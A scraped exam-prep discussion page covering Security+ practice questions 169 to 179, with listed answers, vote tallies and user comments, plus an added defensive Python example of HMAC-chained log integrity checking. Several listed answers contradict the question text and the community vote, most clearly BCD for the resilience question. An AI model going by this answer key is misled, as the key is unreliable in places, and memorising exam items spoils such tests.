litigation is pending or reasonably anticipated. By issuing a legal hold, organizations notify custodians about their duty not to delete ESI or
physical documents relevant to a case.
upvoted 1 times

  keak 2 months ago


Selected Answer: A
Legal hold: Protecting any documents that can be used in evidence from being altered or destroyed, sometimes called litigation hold.
upvoted 1 times

  JSOG 2 months, 2 weeks ago


Selected Answer: A
A sounds the best
upvoted 1 times

  bengy78 2 months, 3 weeks ago


If the company is under a legal investigation, a legal hold is put on them; it's not something they put on themselves. The question asks what they
could "implement" that would help. That would be a DLP so data can't get moved/removed/deleted.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


Why not DLP?
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: B
Hmm! When security breaches go to trial, the chain of custody protects an organization against accusations that evidence has either been
tampered with or is different than it was when it was collected. Legal hold refers to the fact that information that may be relevant to a court case
must be preserved. Wow. Chain of custody sounds close to me
upvoted 1 times

  zharis 3 months, 1 week ago


But looking deeply into the question itself, I feel a legal hold is more preferable because there is no mention of the company needing any form of
protection. My final answer will be A
upvoted 1 times


  comeragh 3 months, 2 weeks ago


Selected Answer: A
Agree with A.
not deleted - legal hold
not modified - chain of custody
upvoted 4 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
A, legal hold seems to be the right answer
upvoted 2 times

  KetReeb 5 months ago


Answer is A: once an organization is aware that it needs to preserve evidence for a court case, it must do so. The mechanism is fairly simple as
well: once you realize your organization needs to preserve evidence, you must use a legal hold, or litigation hold, which is the process by which
you properly preserve any and all digital evidence related to a potential case.
upvoted 4 times

  Joe1984 5 months ago


I'm torn between a and b. Doesn't legal hold require information, like emails, to be kept for a certain amount of time?
upvoted 2 times


Question #169 Topic 1

A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user
opened a ticket for this issue but was able to log in successfully. Which of the following BEST describes the policy that is being implemented?

A. Time-based logins

B. Geofencing

C. Network location

D. Password history

Correct Answer: B

Community vote distribution


A (100%)

  Wildstar Highly Voted  5 months, 1 week ago


This doesn't state that on Monday he came back onto the local corporate network, just that he connected successfully now. How can it be
Geofencing if he is still off premises?
upvoted 8 times

  deeden 4 months, 1 week ago


Maybe this question was created before the pandemic started, and that working remotely on a Monday is just incomprehensible at that time :)
I agree with option A.
upvoted 2 times

  stoneface 5 months ago


Exact same thought I have, there is no mention of returning to offices.
upvoted 2 times

  KetReeb 5 months ago


time-based logins (A): couldn't login on the weekend. The question is vague, but sounds like he connected to the site via his vpn, but could
not log in on the weekend.
upvoted 5 times

  banditring Highly Voted  5 months ago


This question is flawed; it's clearly Time-based logins. I'm starting to think that the actual CompTIA test has these wrong answers just to trick us
in order for us to fail, and they make money just so we can retake this exam.
upvoted 5 times

  Olu_G Most Recent  1 month, 1 week ago


The user knows that his schedule was not time based that was why he attempted to login. If the question says a new user that might be a
different thing.
upvoted 1 times

  FMMIR 2 months, 3 weeks ago


Time-based authentication is a special procedure to prove an individual's identity and authenticity on appearance simply by detecting its
presence at a scheduled time of day or within a scheduled time interval and on a distinct location. To enable time-based authentication, a special
combination of objects is required.
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: A
Time based logins should be the answer because Geofencing is accepting or rejecting access requests based on location.
upvoted 1 times

  p610878 3 months, 3 weeks ago


Time-based logins: Time-of-day restrictions is an access control concept that limits when a user account is able to log into a system or network.
This is a tool and technique for limiting access to sensitive environments to normal business hours, when oversight and monitoring can be
performed to prevent fraud, abuse, or intrusion. Time-of-day restrictions may also force logout on an account after the authorized time period ends.
upvoted 3 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
Time based login
upvoted 1 times


  k9_462 4 months, 3 weeks ago


Selected Answer: A
this has to be a time based login issue
upvoted 2 times

  whateverIguess 4 months, 3 weeks ago


Ok, I think I figured this one out. I kept saying it's Time-based logins based on the information given in the question, BUT the correct term is TOTP
(Time-based One-Time Passwords). If the option was TOTP instead of Time-based logins, then it would be the answer. But CompTIA seriously
makes this test trickier than it has to be
upvoted 1 times

  varun0 5 months ago


Selected Answer: A
On Monday he logged in via VPN just like he did on the weekends and it worked.
upvoted 2 times

  Josh_Feng 5 months ago


Selected Answer: A
Question is a bit misleading, but we are assuming that he never went back to the office. Since it is assumed to be a time issue, it has to be A.
upvoted 1 times

  Joe1984 5 months ago


Time-based makes more sense here. Network access was turned off during the weekend.
upvoted 3 times


Question #170 Topic 1

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign
strategies to give the opposition party an advantage. Which of the following BEST describes these threat actors?

A. Semi-authorized hackers

B. State actors

C. Script kiddies

D. Advanced persistent threats

Correct Answer: B

Community vote distribution


B (80%) D (20%)

  JoeThun Highly Voted  11 months, 3 weeks ago


E: Hacktivists , FUCK YOU COMPTIA.
upvoted 93 times

  varun0 Highly Voted  5 months ago


Selected Answer: B
Fuck comptia
upvoted 5 times

  ImpactTek Most Recent  2 months, 3 weeks ago


The answer should be "Hacktivist" which is not among the answers. State actors can make advanced persistent threats (APT), but they should
be able to do hacktivism, so I go with state actors.
upvoted 3 times

  zharis 3 months, 1 week ago


Selected Answer: B
On the spot... State actors' goals are primarily espionage and strategic advantage, but it is not unknown for countries
upvoted 2 times

  ostralo 3 months, 3 weeks ago


“Nation-state threat actors are persistent and mission-oriented, which makes it that much more difficult for private organizations to defend
effectively,”

Unlike criminal actors, nation-state threat actors are not motivated by financial gain and have a great deal of sophisticated resources and
patience. As was seen during the SolarWinds attack, blamed on Russia, nation-state actors can lurk inside a compromised network for months
without detection.

Anyway, go for Hacktivists if there is one.


upvoted 1 times

  ostralo 3 months, 3 weeks ago


https://www.cybersecuritydive.com/news/nation-state-threat-actors/621100/
upvoted 1 times

  adodoccletus 4 months, 1 week ago


This is not a state actor because he is not sponsored by the state...... State actor seems to be the best answer in the options anyways
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


This is literally a hacktivist but whatever comptia
upvoted 3 times

  Joe1984 5 months ago


They have re-worded the question and changed available answers, State actors is correct.
upvoted 4 times

  MrBrave 6 months ago


B
It should be hacktivists but that's not on the list of options so I'm leaning to state actors as it mentioned "political party"
upvoted 1 times

  RougePotatoe 6 months, 2 weeks ago


Selected Answer: B


Comptia's handbook:
APT=An attacker's ability to obtain, maintain, and diversify access to network systems using exploits and malware.

Stateactor=A type of threat actor that is supported by the resources of its host country's military and security services.
upvoted 2 times
  Ribeiro19 7 months, 3 weeks ago
Selected Answer: B
It's B, folks. Nothing in the question indicates APT.
upvoted 2 times

  SpicyTangerine 7 months, 3 weeks ago


Selected Answer: B
Ans B: state actors. According to Darril Gibson’s security + book “While APTs can be any group of highly organized attackers, they are typically
sponsored by nation-states or governments. In this context, APT members are state actors. These state actors typically have specific targets,
such as a certain company, organization, or government agency. Successful attacks often allow unauthorized access for long periods of time,
giving the APTs the ability to exfiltrate a significant amount of data”
upvoted 1 times

  Branchflake 10 months, 1 week ago


It would have to have Nation state actor (which is another name for APT) for that to be the answer. State actors are just APT, therefore D-APT is
the answer
upvoted 2 times

  hmAZtime 10 months, 2 weeks ago


what a question! I've never seen State Actor in SY601. But from the website provided with the answer, looks like it's kinda similar to Hacktivists.
Okay, I remember the answer. Hope it won't be in the exam!
upvoted 1 times

  CapnFlint 10 months, 3 weeks ago


The best answer is hacktivist, but that's not an option. I don't think it's APT because it doesn't say anything about an advanced attack or the
attackers hanging in the system undetected for a period of time. State actor is too specific; there's nothing to suggest this is a state actor. That
leaves script kiddie. Not a good answer, but the one that makes the most sense.
upvoted 1 times

  wolf_123 10 months, 3 weeks ago


Selected Answer: D
Politically motivated? -> hacktivist
Hacking a specific political party and giving the opposite party an advantage, while may causing trouble in the country? -> more like APT (which
is technically state actor?)
upvoted 3 times

  [Removed] 6 months, 1 week ago


Prof Messer's notes have APTs as commonly used by nation state actors. Assuming his notes accurately represent the CompTIA objectives,
state actors are the actors and APTs are sometimes used. Based on this question we don't know if they used an APT. The attacker could've
just hacked in once, grabbed the data, and gotten out. I'd probably guess state actor.
upvoted 1 times

  shemilandia 10 months, 3 weeks ago


From CompTIA official Book: State Actors
At the top end of the spectrum shown in Figure 5-1 are those highly technical individuals, often referred to as elite hackers, who not only have the
ability to write scripts that exploit vulnerabilities but also are capable of discovering new vulnerabilities. This group is the smallest of the lot,
however, and is responsible for, at most, only 1 to 2 percent of intrusive activity. Many of these elite hackers are employed by major cybersecurity
firms in an effort to combat criminal activity. Others are employed by nation-states and other international organizations, to train and run large
groups of skilled hackers to conduct nation-state attacks against a wide range of adversaries. In the United States, government rules and
regulations prevent government workers from attacking companies for reasons of economic warfare. Not all countries live by this principle, and
many have organized hacking efforts designed to gather information from international companies, stealing intellectual property for the express
purpose of advancing their own country’s national companies.
upvoted 2 times


Question #171 Topic 1

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?

A. Default system configuration

B. Unsecure protocols

C. Lack of vendor support

D. Weak encryption

Correct Answer: B

Community vote distribution


C (92%) 8%

  hac_cah Highly Voted  1 year ago


Selected Answer: C
Lack of vendor support implies no security patches. Unsecure protocols are not necessarily always the case.
upvoted 23 times

  ishallgetit 9 months, 2 weeks ago


"security patches" convince me that C is correct answer
upvoted 2 times

  elberG Highly Voted  11 months ago


The risk is Unsecure protocols, which is caused by lack of vendor support.
upvoted 11 times

  andrizo 3 months, 3 weeks ago


not necessarily unsecure, just outdated security
upvoted 1 times

  viksap Most Recent  1 month, 2 weeks ago


Selected Answer: C
Agree with C, since no patches will be available, which will increase security risk
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: C
Going with the most correct answer here would be C, as I searched the definition of Legacy online and saw that it literally means "out of date"
systems, and I am reminded of the recent updates such as how phone companies say they won't support old phones made only 5 years ago (I'm
shocked to think that so many resources go into making a device so short lived - what happened to long life products lol)
upvoted 1 times

  darkgypsy 3 months ago


Selected Answer: C
Legacy Systems - Legacy systems are a source of risk because they no longer receive security updates
and because the expertise to maintain and troubleshoot them is a scarce resource
upvoted 1 times

  Orean 3 months, 1 week ago


Selected Answer: C
It's perfectly plausible for legacy systems to have protocol issues, but the scenario doesn't state that. All we can definitively infer is that the
legacy system—by definition—is not being actively supported or maintained by the vendor, which can cause various issues.
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: B
legacy items have protocol issues.
upvoted 1 times

  PiotrG 4 months, 1 week ago


Selected Answer: C
because i am king piotr
upvoted 1 times

  db97 4 months, 1 week ago


I think "lack of Vendor Support" is the reason but not the risk and also I wouldn't discard "Weak Encryption" as a potential risk due to if it is a
web server for example, they could still use a "secure protocol" by setting up HTTPS but the encryption might be under SSL 1.0/2.0/3.0 and not
even TLS and that would be real risk. These are just my thoughts, I'm open to discuss it.
upvoted 1 times

  Boats 4 months, 3 weeks ago


Selected Answer: C
Having used legacy software, I would go with C. We don't have enough information to go with anything else. We only know that it is potentially
unsupported.
upvoted 2 times

  Joe1984 5 months ago


I believe it is Unsecure protocols. It's basically saying it's old, there is no vendor support, what is the result = unsecure protocols
upvoted 2 times

  [Removed] 5 months, 1 week ago


Selected Answer: C
The fact that this is a legacy system doesn't mean it uses default credentials, weak encryption or unsecure protocols.
Hence the only answer may be "Lack of vendor support"
upvoted 3 times

  Bman3001 5 months, 1 week ago


I checked multiple sites and even though I think the answer is C. I will have to go with unsecure protocols per this site and the others I saw
upvoted 2 times

  EdT1 6 months, 1 week ago


Selected Answer: B
Agreed with B. Unsecured protocols, ports, backdoor not being fixed by new patches.
upvoted 2 times

  cartoonz 5 months, 2 weeks ago


This could be the result of Lack of Vendor Support, but it's not the main risk; other issues could arise as well that wouldn't be supported.
upvoted 2 times

  CapnFlint 10 months, 3 weeks ago


It's lack of vendor support. A legacy program does not necessarily use unsecure protocols; what makes it legacy is lack of vendor support (no
patches provided by the vendor is the main concern here)
upvoted 6 times

  LordScorpius 11 months, 4 weeks ago


If it had unsecure protocols it would be because of a lack of vendor support.
upvoted 1 times

  BLADESWIFTKNIFE 1 year ago


Selected Answer: C
I thought it would be C too. Because of the Legacy program
upvoted 1 times

  Papaapa77 11 months, 2 weeks ago


Legacy programs are due to lack of vendor support
I will go with C
upvoted 1 times


Question #172 Topic 1

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment.
Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST
describes the type of assessment taking place?

A. Input validation

B. Dynamic code analysis

C. Fuzzing

D. Manual code review

Correct Answer: B

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
Dynamic analysis means that the application is tested under "real world" conditions using a staging environment.
upvoted 10 times

  andrizo Most Recent  3 months, 3 weeks ago


What's the difference between code analysis and manual code review?
upvoted 1 times

  NavySteel 2 months, 3 weeks ago


Manual code review is when the developer checks every line of code.
upvoted 1 times

  ostralo 3 months, 3 weeks ago


static code analysis is a form of white-box testing that can help identify security issues in source code. On the other hand, dynamic code analysis
is a form of black-box vulnerability scanning that allows software teams to scan running applications and identify vulnerabilities.

When properly implemented, dynamic code analysis can reduce mean time to identification (MTTI) for production incidents, improve visibility to
application issues, and increase a project’s overall security posture.

https://www.checkpoint.com/cyber-hub/cloud-security/what-is-dynamic-code-analysis/
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: B
Agree with B
upvoted 1 times


Question #173 Topic 1

Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?

A. Smart card

B. Push notifications

C. Attestation service

D. HMAC-based one-time password

Correct Answer: B

Community vote distribution


B (91%) 9%

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: B
It's like the Google notification; it is an MFA: it gives you push notifications to authenticate and alerts you when someone is trying to log in to your account.
upvoted 9 times

  deeden 4 months, 1 week ago


OTP can be used the same scenario, although no approve/deny button?
upvoted 1 times

  serginljr 4 months, 3 weeks ago


Correct
upvoted 2 times

  ronniehaang Most Recent  4 days, 4 hours ago


Selected Answer: B
Push notifications (B) can work as an authentication method and an alerting mechanism for unauthorized access attempts. Push notifications
allow for two-factor authentication (2FA), where a user receives a message on their mobile device that must be confirmed in order to log in to an
application or website. If an unauthorized access attempt is made, the system can alert the user via a push notification, allowing the user to take
action and confirm whether the access attempt was legitimate or not. This serves as an additional layer of security beyond a username and
password, and provides a way for the user to be aware of and prevent potential unauthorized access.
upvoted 1 times

  nicekoda 1 month ago


Push Notification Authentication enables user authentication by sending a push notification directly to a secure application on the user's device,
alerting them that an authentication attempt is taking place. The answer is B
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
A smart card can work as both an authentication method and an alerting mechanism for unauthorized access attempts. A smart card is a
physical card, typically the size of a credit card, that contains a microprocessor and memory. The card can be inserted into a card reader, where it
can be used to authenticate the user's identity by requiring a personal identification number (PIN) or password.

Additionally, a smart card can also be configured to send a push notification to the user's mobile device whenever an unauthorized access
attempt is detected. This can alert the user to the attempt and allow them to take appropriate action to prevent unauthorized access.
upvoted 1 times

  Sandon 1 week, 3 days ago


That ain't it
upvoted 2 times

  andrizo 3 months, 3 weeks ago


What Is an Attestation Service? An attest service, or attestation service, is an independent review of a company's financial statement conducted
by a certified public accountant (CPA). The CPA delivers an attestation report with conclusions about the reliability of the data.
upvoted 1 times


Question #174 Topic 1

A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers
without migrating servers to a new network. Which of the following solutions should the company implement?

A. Intranet

B. Screened subnet

C. VLAN segmentation

D. Zero Trust

Correct Answer: C

Community vote distribution


C (100%)

  banditring Highly Voted  5 months ago


Just for someone (like me) that didn't know what a flat network is: a flat network is a computer network design approach that aims to reduce cost,
maintenance and administration. Flat networks are designed to reduce the number of routers and switches on a computer network by connecting
the devices to a single switch instead of separate switches.
upvoted 33 times

  RonWonkers 4 months, 1 week ago


Thanks
upvoted 1 times

  db97 4 months, 1 week ago


Thank you for sharing, that was useful.
upvoted 2 times

  aktion Most Recent  1 month, 3 weeks ago


Using a vlan will require that you provide a new subnet for the servers that you will be moving into the new vlan. The right option in my opinion is
zero trust. As that allows for grouping servers and applying specific policies to them even though they are in the same subnet.
upvoted 1 times

  cymm 4 weeks ago


I agree with you. Anyone who knows networks would know you can't VLAN segment without IP segmenting as well. The only way here would be
some sort of ZTNA implementation, no doubt in this case network security rules in the cloud.
upvoted 1 times

  Blueteam 2 months, 1 week ago


A flat network is a network that doesn't utilize VLANs.
All communications happen in one layer. Using VLANs will give layers to the network.
Now communications will happen on different virtual channels or layers.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: C
I agree with this.
upvoted 1 times

  Knowledge33 3 months ago


Thank you for this definition.
upvoted 1 times


Question #175 Topic 1

The president of a regional bank likes to frequently provide SOC tours to potential investors. Which of the following policies BEST reduces the risk
of malicious activity occurring after a tour?

A. Password complexity

B. Acceptable use

C. Access control

D. Clean desk

Correct Answer: D

Community vote distribution


D (65%) C (35%)

  Boats Highly Voted  4 months, 3 weeks ago


Selected Answer: D
A malicious investor would not be able to take advantage of anything gained until after the tour if they swiped a USB, or looked at or stole
documents. If there was a clean desk policy, then that would prevent issues after a tour.
upvoted 11 times

  ronniehaang Most Recent  4 days, 4 hours ago


Selected Answer: C
The best policy to reduce the risk of malicious activity after a SOC tour is "Access control". Access control defines the specific individuals who
are authorized to enter a secure area and what actions they are permitted to perform while inside. It also defines when and how those
permissions can be changed or revoked. By implementing access control policies, the president of the regional bank can ensure that only
authorized personnel are able to access the SOC and sensitive information during and after the tours, reducing the risk of malicious activity.
upvoted 1 times

Boubou480 4 weeks ago
Selected Answer: C
C. Access control is the best answer to reduce the risk of malicious activity occurring after a tour. Implementing access control measures such as
limiting access to certain areas or systems to authorized personnel only can help to prevent unauthorized individuals from gaining access to
sensitive information or systems. This is especially important if the president is giving tours to potential investors, as they may not have the same
level of clearance as employees of the bank. Ensuring that access controls are in place and strictly enforced can help to reduce the risk of
malicious activity or unauthorized access.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: C
The best policy to reduce the risk of malicious activity occurring after a tour is access control. Access control refers to the measures put in place
to limit access to a building, system, or network to only authorized individuals. This can include measures such as requiring a password, using
security badges or installing security cameras. By limiting access to only authorized individuals, the risk of malicious activity occurring is
significantly reduced.
upvoted 2 times

J_Ark1 2 months, 4 weeks ago
Selected Answer: D
At first I was thinking C but now I'm going with D as it's a policy, which takes time and red tape through admin to authorise etc., and anyway what
bank doesn't already have ACLs... Working in an office I find that a clean desk policy is best suited to prevent undercover reporters, competitors
or malicious actors snooping company secrets left on the desk if it's been a hectic day in the office. We have all seen the movie of that one person
sneaking away with a USB stick after a tour of an office holding top secret information, or is it just me? ;-)
upvoted 2 times

Sutokuto 3 months, 1 week ago
Selected Answer: D
>After the tour
upvoted 3 times

03allen 3 months, 2 weeks ago
Selected Answer: C
going with C after tour
upvoted 1 times

andrizo 3 months, 3 weeks ago
Selected Answer: D

I think people are focusing on "after the tour" too much. Clean desk is for removing sensitive documents in plain sight; no one's going to use this
during the tour. Access control could literally be anything, like door locks.
upvoted 4 times
Skelter117 3 months, 3 weeks ago
The way I take it is: if credentials or proprietary information is seen on a desk, then after the tour is over the person that saw the information can use
it maliciously.

I'm going with clean desk.
upvoted 3 times

dansecu 3 months, 4 weeks ago
Selected Answer: D
Access control should be implemented at any time, not only during or after tours.
Clean desk and hiding non-public sensitive data from monitors is highly recommended during tours by external users.
upvoted 3 times

comeragh 4 months ago
Selected Answer: C
C - Access Control for me. Key words "after the tour"
upvoted 3 times

ramesh2022 4 months ago
I go with D. An investor can take any ID or contact or credential notes etc. if anyone leaves them on the table, and try after the tour.
upvoted 2 times

zevoroth 4 months, 1 week ago
Selected Answer: C
I was torn between C and D, but I'm going with C. at the conclusion of the tour, access control ensures nobody is hanging around the SOC to
commit malicious acts.
upvoted 1 times

deeden 4 months, 1 week ago
Selected Answer: C
In my opinion, Access control can deter and/or prevent potential intrusion attempts (physical or network) after a recon scenario such as this.
upvoted 2 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: D
Agree with D, the question states "reduces the risk of malicious activity occurring after a tour?" During the tour someone grabbed a USB stick or
ID card, making malicious activity possible after the tour.
upvoted 2 times

Ay_ma 4 months, 3 weeks ago
The question says "after the tours" not during. I would go with D if it was during the tours.
But then it doesn't make sense that a malicious investor would risk coming back if he is a known investor.
But then they have a good idea of the building's layout, so they could easily carry out a physical operation with that knowledge. Like in those
movies where someone goes into the building to scout the level of security before the big operation.
upvoted 3 times

deeden 4 months, 1 week ago
Good point, after, not during. Maybe option C. Access Control? One possible scenario could also be shoulder surfing. SOC could potentially
display a number of sensitive info during operation which can be used later for intrusion attempts, physical or technical.
upvoted 2 times

Ay_ma 4 months, 3 weeks ago
Or even in the case of tailgating. Someone posing as an investor.
upvoted 2 times

kingsAffection 4 months, 4 weeks ago
Selected Answer: D
keyphrase - "after a tour", post-its containing credentials may be stolen and used for unauthorized access later on, therefore, I go with Clean
Desk Policy.
upvoted 3 times

Question #176 Topic 1

A Chief Information Security Officer has defined resiliency requirements for a new data center architecture. The requirements are as follows:
* Critical fileshares will remain accessible during and after a natural disaster.
* Five percent of hard disks can fail at any given time without impacting the data.
* Systems will be forced to shut down gracefully when battery levels are below 20%.
Which of the following are required to BEST meet these objectives? (Choose three.)

A. Fiber switching

B. IaC

C. NAS

D. RAID

E. UPS

F. Redundant power supplies

G. Geographic dispersal

H. Snapshots

I. Load balancing

Correct Answer: BCD

Community vote distribution


DEG (100%)

Vishnuks Highly Voted 5 months ago
Answer D,E,G correct me If I'm wrong
upvoted 31 times

[Removed] 5 months ago
I agree with you and stone
upvoted 2 times

deeden 4 months, 1 week ago
Agree with DEG, makes sense.
upvoted 3 times

k9_462 5 months ago
same.
RAID covers the 5% disk failure
UPS covers the graceful shutdown
Geo Disp covers the critical file shares remain available during disaster
upvoted 9 times

stoneface 5 months ago
same thought here.
upvoted 7 times

FMMIR Most Recent 1 month, 3 weeks ago
Selected Answer: DEG
To BEST meet the objectives described in the question, the following solutions are required:

D. RAID: Using RAID (Redundant Array of Independent Disks) technology allows for data to be distributed across multiple disks, providing
protection against disk failures.

E. UPS: Using an uninterruptible power supply (UPS) will ensure that systems can shut down gracefully when battery levels are low, protecting
against data loss due to sudden power outages.

G. Geographic dispersal: Spreading critical data across multiple data centers in different geographic locations will ensure that it remains
accessible even if one data center is affected by a natural disaster.
upvoted 2 times

J_Ark1 2 months, 4 weeks ago
Selected Answer: DEG
Yes :) 100percent
upvoted 1 times
Iphy23 3 months, 2 weeks ago
what is NAS?
upvoted 1 times

Vegaswhodat1 3 months, 2 weeks ago
Network Attached Storage
upvoted 1 times

alayeluwa 3 months, 3 weeks ago
Selected Answer: DEG
I’m going with that.
upvoted 2 times

comeragh 4 months ago
Selected Answer: DEG
D,E,G - agreed
upvoted 2 times

ramesh2022 4 months ago
DEG is the best answer
upvoted 2 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: DEG
Agree with D,E,G
upvoted 2 times

msyusa 4 months, 2 weeks ago
d,e,g highly correct
upvoted 2 times

FQ 4 months, 3 weeks ago
Selected Answer: DEG
Same explanation as K9_462
upvoted 3 times

Question #177 Topic 1

Which of the following is a security best practice that ensures the integrity of aggregated log files within a SIEM?

A. Set up hashing on the source log file servers that complies with local regulatory requirements.

B. Back up the aggregated log files at least two times a day or as stated by local regulatory requirements.

C. Write protect the aggregated log files and move them to an isolated server with limited access.

D. Back up the source log files and archive them for at least six years or in accordance with local regulatory requirements.

Correct Answer: A

Community vote distribution


A (79%) C (21%)

stoneface Highly Voted 5 months ago
Selected Answer: A
Set up hashing will provide integrity
upvoted 5 times

ronniehaang Most Recent 4 days, 4 hours ago
Selected Answer: A
A. Set up hashing on the source log file servers that complies with local regulatory requirements.

Hashing is a security best practice to ensure the integrity of log files within a SIEM. By setting up a hash on the source log file servers, the SIEM
can detect if the log files have been tampered with or altered in any way. This helps to ensure the integrity and accuracy of the log files and
provides an added layer of security. It is also important to comply with local regulatory requirements regarding hashing and log file retention.
upvoted 1 times

lordguck 3 months, 1 week ago
Regarding A as the solution: I can't see how hashing the original source logs helps if you are asked to ensure the integrity of the aggregated (!) log
files. So it is C, I think. Please correct me if I am wrong.
upvoted 2 times

comeragh 4 months ago
Selected Answer: A
Agree with A here. As per Jason Dion's tips for the exam: match integrity with hashing.
upvoted 3 times

deeden 4 months, 1 week ago
Selected Answer: A
I agree with A. This question is concerned with integrity; there is no mention of availability.
upvoted 2 times

hazeleyes 4 months, 3 weeks ago
Selected Answer: A
Log File Integrity Validation in AWS

This feature informs you on any modifications or deletions to CloudTrail logs. By using SHA-256 for hashing and SHA-256 with RSA for digital
signing, AWS claims, “This makes it computationally infeasible to modify, delete, or forge CloudTrail log files without detection.”
upvoted 4 times
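To make the hashing answer concrete, here is an added example (not from the page, the exam, or AWS): a keyed hash chain over aggregated log records that lets a SIEM detect altered, removed or truncated entries. It uses HMAC-SHA256 in place of the SHA-256-plus-RSA signing the CloudTrail digest uses; the key, the log events and all names are constructed for the illustration.

```python
import hashlib
import hmac

# Constructed sample records as a SIEM might aggregate them (not taken from the page).
SAMPLE_EVENTS = [
    "2023-01-23T10:00:01Z srv01 sshd[812]: Accepted publickey for alice from 10.0.0.5",
    "2023-01-23T10:00:05Z srv01 sudo: alice : COMMAND=/usr/bin/systemctl restart nginx",
    "2023-01-23T10:01:17Z srv02 sshd[233]: Failed password for invalid user admin from 10.0.0.9",
    "2023-01-23T10:01:20Z srv02 sshd[233]: Failed password for invalid user admin from 10.0.0.9",
]
GENESIS = b"\x00" * 32  # fixed link feeding the first record's MAC


def seal(events, key):
    """Chain the records: each MAC covers the previous MAC plus the event text.

    Returns (records, head). The head must be stored where the log writer cannot
    reach it (e.g. the SIEM's own store), otherwise truncation at the end goes unnoticed.
    """
    records, prev = [], GENESIS
    for seq, event in enumerate(events):
        mac = hmac.new(key, prev + event.encode(), hashlib.sha256).digest()
        records.append({"seq": seq, "event": event, "mac": mac.hex()})
        prev = mac
    return records, prev.hex()


def verify(records, head, key):
    """Walk the chain; return (True, None) if intact, else (False, where it broke)."""
    prev = GENESIS
    for i, rec in enumerate(records):
        expected = hmac.new(key, prev + rec["event"].encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected.hex(), rec["mac"]):
            return False, (f"chain breaks at record {i}: it was modified, "
                           "or a record before it was removed or reordered")
        prev = expected
    if not hmac.compare_digest(prev.hex(), head):
        return False, "stored head does not match: records appended or truncated at the end"
    return True, None


if __name__ == "__main__":
    key = b"constructed-demo-key-held-by-the-siem"  # in practice a KMS/HSM-backed secret
    records, head = seal(SAMPLE_EVENTS, key)
    print("intact:", verify(records, head, key))

    edited = [dict(r) for r in records]
    edited[1]["event"] = edited[1]["event"].replace("alice", "bob")
    print("edited record:", verify(edited, head, key))

    print("deleted middle record:", verify(records[:1] + records[2:], head, key))
    print("truncated tail:", verify(records[:-1], head, key))

    # Without the SIEM's key a rewritten file cannot be re-sealed so that it verifies.
    forged, forged_head = seal(edited, b"attacker-guess")
    print("re-sealed with wrong key:", verify(forged, forged_head, key))
```

A plain (unkeyed) hash chain would catch accidental corruption but not a rewrite by someone who can edit the aggregated file and recompute the hashes; the key or signature is what ties integrity to the SIEM rather than to the log server.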

j0n45 4 months, 4 weeks ago
Selected Answer: C
I'd say C, write protecting the aggregated log files and moving them to an isolated server with limited access would protect them from tampering,
modification, and deletion
upvoted 4 times

zzzfox 4 months, 3 weeks ago
An isolated server would limit the risk, but still, you are not able to validate the integrity
upvoted 4 times

Question #178 Topic 1

A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company's cloud environment. Which of
the following is an immediate consequence of these integrations?

A. Non-compliance with data sovereignty rules

B. Loss of the vendors interoperability support

C. Mandatory deployment of a SIEM solution

D. Increase in the attack surface

Correct Answer: A

Community vote distribution


D (78%) A (15%) 7%

stoneface Highly Voted 5 months ago
Selected Answer: D
Choosing D:
While Non-compliance with data sovereignty rules is an implication of having multiple cloud providers at DIFFERENT countries, this is not
specified in the question, besides, they are security solutions, which typically means they will not collect any kind of PII, PHI, SPI
upvoted 18 times

ostralo 3 months, 3 weeks ago
I don't understand why this increases the attack surface.. Data has been collected by many different Security Solutions(they might have
different data centers in different regions or countries)
upvoted 1 times

Gino_Slim 3 months, 1 week ago
It creates more opportunity for an issue with many different solutions taking place
upvoted 1 times

viksap Most Recent 1 month, 2 weeks ago
Selected Answer: A
Thinking of laws and regulations related to PII or PHI or may be GDPR but not sure
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: D
The immediate consequence of authorizing multiple security solutions to collect data from a company's cloud environment is an increase in the
attack surface. This is because each security solution that is authorized to collect data from the company's cloud environment adds another
potential entry point for attackers to exploit. This can make it more difficult to secure the cloud environment and can increase the risk of a
successful cyberattack.
upvoted 2 times

HL2020 1 month, 4 weeks ago
Selected Answer: A
I'm not sure how this isn't A. You are letting other companies get to your data, this would pertain to data regulations.
upvoted 2 times

BluEric 2 months, 3 weeks ago
Selected Answer: A
Since this is the company's cloud environment, it is likely a private cloud. Allowing others to access that data would mean they will have to follow
the data regulations, including GDPR, for example. So I am going with A, although this is a very annoying question.
upvoted 1 times

rhocale 1 month, 2 weeks ago
This happens all the time; it's not any kind of compliance issue, and it never says it leaves the United States or where it (the main cloud
company) or the other businesses are. If you are just looking at the question without taking it any further, the answer must be D.
upvoted 2 times

Sony12 2 months, 4 weeks ago
Answer is C. Mandatory deployment of a SIEM solution to Log all relevant events and filter irrelevant data in one place.
upvoted 1 times

J_Ark1 2 months, 4 weeks ago
Slows down the system and opens it up to vulnerabilities, I think.
upvoted 1 times
Ashbash95 3 months ago
Selected Answer: C
Answer is C
upvoted 2 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: D
I agree with D
upvoted 1 times

Question #179 Topic 1

